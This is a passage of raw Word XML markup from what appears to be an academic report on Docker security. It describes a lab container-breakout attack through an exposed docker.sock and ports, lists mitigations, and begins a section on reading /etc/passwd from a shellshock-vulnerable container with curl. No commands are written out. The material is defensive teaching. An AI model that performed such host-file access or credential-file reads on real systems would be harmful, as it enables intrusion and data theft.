          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007F52C8" w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creating a container </w:t>
      </w:r>
      <w:r w:rsidR="00D70C61" w:rsidRPr="00D70C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mapped to the host directory.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w14:paraId="10FB8EBA" w14:textId="77777777" w:rsidR="003815C6" w:rsidRPr="003815C6" w:rsidRDefault="003815C6" w:rsidP="003815C6"/>
    <w:p w14:paraId="5C9E3A8D" w14:textId="343574E2" w:rsidR="003815C6" w:rsidRDefault="003815C6" w:rsidP="003815C6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555FDAD0" wp14:editId="595A470F">
            <wp:extent cx="5149850" cy="1176542"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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49850" cy="1176542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D1E157" w14:textId="2E2D87D0" w:rsidR="00295406" w:rsidRDefault="00295406" w:rsidP="00275F4C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc86858656"/>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Surfing on the host d</w:t>
      </w:r>
      <w:r w:rsidR="00275F4C" w:rsidRPr="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irectories</w:t>
      </w:r>
      <w:r w:rsidR="00275F4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="00BDFA37" w14:textId="679BEF2D" w:rsidR="00867299" w:rsidRDefault="00867299" w:rsidP="00867299">
      <w:r>
        <w:t xml:space="preserve">This attack </w:t>
      </w:r>
      <w:r w:rsidR="0038015E">
        <w:t xml:space="preserve">leveraged the Unix socket </w:t>
      </w:r>
      <w:r w:rsidR="008E2B1D">
        <w:t>and exposed ports</w:t>
      </w:r>
      <w:r w:rsidR="00DD04F7">
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="008E2B1D">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="004B1934">
        <w:t>access the entire Docker host file system</w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0000276D">
        <w:t xml:space="preserve"> and its impact can jeopardize</w:t>
      </w:r>
      <w:r w:rsidR="002932C6">
        <w:t xml:space="preserve"> confidential inform</w:t>
      </w:r>
      <w:r w:rsidR="00167665">
        <w:t xml:space="preserve">ation of enterprises </w:t>
      </w:r>
      <w:r w:rsidR="00167665">
        <w:lastRenderedPageBreak/>
        <w:t>and individuals</w:t>
      </w:r>
      <w:r w:rsidR="00880E04">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001E29F7">
        <w:t xml:space="preserve"> Suppose the Docker host </w:t>
      </w:r>
      <w:r w:rsidR="00723715">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00B138F2">
        <w:t>hosting</w:t>
      </w:r>
      <w:r w:rsidR="00723715">
        <w:t xml:space="preserve"> multiple </w:t>
      </w:r>
      <w:r w:rsidR="00390FD0">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="00723715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C66FF">
        <w:t>of numerous business enterprises</w:t>
      </w:r>
      <w:r w:rsidR="003372AE">
        <w:t xml:space="preserve"> and organisations</w:t>
      </w:r>
      <w:r w:rsidR="00AB509D">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00390FD0">
        <w:t>production.</w:t>
      </w:r>
      <w:r w:rsidR="00577FC8">
        <w:t xml:space="preserve"> In such </w:t>
      </w:r>
      <w:r w:rsidR="0003386B">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="001F7BB6">
        <w:t>scenario,</w:t>
      </w:r>
      <w:r w:rsidR="005B0319">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F7BB6">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="005B0319">
        <w:t xml:space="preserve"> malicious actor can apply similar techniques </w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="005B0319">
        <w:t xml:space="preserve"> this attack to </w:t>
      </w:r>
      <w:r w:rsidR="00556313">
        <w:t>steal valuable data</w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00C31777">
        <w:t>disrupt business services.</w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t xml:space="preserve"> However, this attack can also </w:t>
      </w:r>
      <w:r w:rsidR="00DE6E41">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="005D332D">
        <w:t>re</w:t>
      </w:r>
      <w:r w:rsidR="00C113B4">
        <w:t>mediated using various techniques and methods</w:t>
      </w:r>
      <w:r w:rsidR="00B937C3">
        <w:t>, discussed in</w:t>
      </w:r>
      <w:r w:rsidR="00B937C3" w:rsidRPr="00C02D4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="129984174"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B937C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B937C3">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B937C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00B937C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1229648885"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B479BD">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B479BD">
            <w:instrText xml:space="preserve"> CITATION OWA21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B479BD">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
          <w:r w:rsidR="00B479BD">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00C113B4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE6E41">
        <w:t xml:space="preserve"> Some of the </w:t>
      </w:r>
      <w:r w:rsidR="005A4696">
        <w:t>techniques to prevent such an attack are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D24036" w14:textId="2B3AC8BC" w:rsidR="003C0B9D" w:rsidRDefault="00CD4878" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run containers with </w:t>
      </w:r>
      <w:r w:rsidR="00122378">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unprivileged </w:t>
      </w:r>
      <w:r w:rsidR="00083C16">
        <w:t>user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4C1F9" w14:textId="55E37DE2" w:rsidR="00083C16" w:rsidRDefault="00083C16" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set volumes to read-only to avoid </w:t>
      </w:r>
      <w:r w:rsidR="006F4BD5">
        <w:t>container breakout attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13612CA2" w14:textId="30DD9B6D" w:rsidR="006F4BD5" w:rsidRDefault="009C1FFD" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not expose </w:t>
      </w:r>
      <w:r w:rsidR="00AF081B">
        <w:t>the /var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="00122378">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidR="00B479BD">
        <w:t xml:space="preserve">share it </w:t>
      </w:r>
      <w:r w:rsidR="00AF081B">
        <w:t>with trusted containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DC95CB" w14:textId="7A2CEBB7" w:rsidR="001E5BE2" w:rsidRDefault="001E5BE2" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not expose ports</w:t>
      </w:r>
      <w:r w:rsidR="003979E6">
        <w:t xml:space="preserve"> unless they are needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D1DBB" w14:textId="608F5676" w:rsidR="002C55BA" w:rsidRDefault="00D46ACC" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Always scan and verify Docker images</w:t>
      </w:r>
      <w:r w:rsidR="003C0B9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE4002">
        <w:t xml:space="preserve">downloaded </w:t>
      </w:r>
      <w:r w:rsidR="003C0B9D">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="00BE4002">
        <w:t>public repositor</w:t>
      </w:r>
      <w:r w:rsidR="00181528">
        <w:t>ies, such as</w:t>
      </w:r>
      <w:r w:rsidR="003C0B9D">
        <w:t xml:space="preserve"> Docker Hub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B710F1B" w14:textId="77750D54" w:rsidR="002F6967" w:rsidRDefault="001A62D4" w:rsidP="002C55BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:r w:rsidR="007D7C19">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="001D3CA7">
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="007D7C19">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001D3CA7">
        <w:t xml:space="preserve">defined network rather </w:t>
      </w:r>
      <w:r w:rsidR="007D7C19">
        <w:t xml:space="preserve">than using </w:t>
      </w:r>
      <w:r w:rsidR="001D3CA7">
        <w:t>the default Docker bridge network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBD903" w14:textId="77777777" w:rsidR="005A3D1F" w:rsidRDefault="005A3D1F" w:rsidP="005A3D1F"/>
    <w:p w14:paraId="5AEC861C" w14:textId="51976CEF" w:rsidR="005A3D1F" w:rsidRDefault="005A3D1F" w:rsidP="005A3D1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760DE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerable application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F609314" w14:textId="4830BD14" w:rsidR="00C165BA" w:rsidRDefault="0098516B" w:rsidP="005A3D1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">reat actors can </w:t>
      </w:r>
      <w:r w:rsidR="00A25C7E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>take advantage of vulnerable applic</w:t>
      </w:r>
      <w:r w:rsidR="00CF21E2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ation</w:t>
      </w:r>
      <w:r w:rsidR="00F03FA1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CF21E2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit and steal valuable information</w:t>
      </w:r>
      <w:r w:rsidR="007B688E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F51886">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> For this reason, a</w:t>
      </w:r>
      <w:r w:rsidR="00F6081E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">n application vulnerable to reverse shell or shellshock was </w:t>
      </w:r>
      <w:r w:rsidR="0070591E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">downloaded from Docker Hub to demonstrate such </w:t>
      </w:r>
      <w:r w:rsidR="00CE080B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>attacks.</w:t>
      </w:r>
      <w:r w:rsidR="008A7993">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="002C4606">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="004335A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">that runs the application exposes port 80 </w:t>
      </w:r>
      <w:r w:rsidR="00C70D9A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>and is mapped to port 8080 on</w:t>
      </w:r>
      <w:r w:rsidR="00CD3BF8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Docker host. This means external </w:t>
      </w:r>
      <w:r w:rsidR="00EE166D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>hosts can access the application via port 8080.</w:t>
      </w:r>
      <w:r w:rsidR="00ED5430">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> The vulnerable application and the </w:t>
      </w:r>
      <w:r w:rsidR="009728D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>attacker’s</w:t>
      </w:r>
      <w:r w:rsidR="00CF1F63">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> containers</w:t>
      </w:r>
      <w:r w:rsidR="00ED5430">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidR="009C21CC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>connected via the default Docker network bridge.</w:t>
      </w:r>
      <w:r w:rsidR="00CF1F63">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> As </w:t>
      </w:r>
      <w:r w:rsidR="009728D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">previously discussed, </w:t>
      </w:r>
      <w:r w:rsidR="0016050F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>containers connected to the same bridge can communicate and exchange data.</w:t>
      </w:r>
      <w:r w:rsidR="00446E29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thus, the </w:t>
      </w:r>
      <w:r w:rsidR="005947E2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">author accessed </w:t>
      </w:r>
      <w:r w:rsidR="006F1BFB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>confidential files, like “/etc/passwd”</w:t>
      </w:r>
      <w:r w:rsidR="00352FD9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E94C4B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">of the application container </w:t>
      </w:r>
      <w:r w:rsidR="00352FD9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="00A17C01">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00352FD9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl tool from the attacker container (alpine)</w:t>
      </w:r>
      <w:r w:rsidR="002C278F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:r w:rsidR="00C50078">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>of the application</w:t>
      </w:r>
      <w:r w:rsidR="0089309E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00C50078">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00C60C66">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidR="00A849CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00A849CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C60C66">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00A849CE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd </w:t>
      </w:r>
      <w:r w:rsidR="00E3172C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">is the file directory </w:t>
      </w:r>
      <w:r w:rsidR="004E1075">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00EB535F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>contai</w:t>
      </w:r>
      <w:r w:rsidR="009C3AC1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ns</w:t>
      </w:r>
      <w:r w:rsidR="000608B3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00973448">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>user’s</w:t>
      </w:r>
      <w:r w:rsidR="000608B3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
      <w:r w:rsidR="00C73C9D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="001F3B34">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, and hence, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00886DC6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">can alter this </w:t>
      </w:r>
      <w:r w:rsidR="006804AA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">valuable information to </w:t>
      </w:r>
      <w:r w:rsidR="00AF2243">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>broaden</w:t>
      </w:r>
      <w:r w:rsidR="006804AA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> his/her attack surface.</w:t>
      </w:r>
      <w:r w:rsidR="00724717">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure </w:t>
      </w:r>
      <w:r w:rsidR="009D4B90">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>66 shows th</w:t>
      </w:r>
      <w:r w:rsidR="00341A33">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="00B26437">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="009D4B90">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker </w:t>
      </w:r>
      <w:r w:rsidR="004B762D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidR="0071269B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
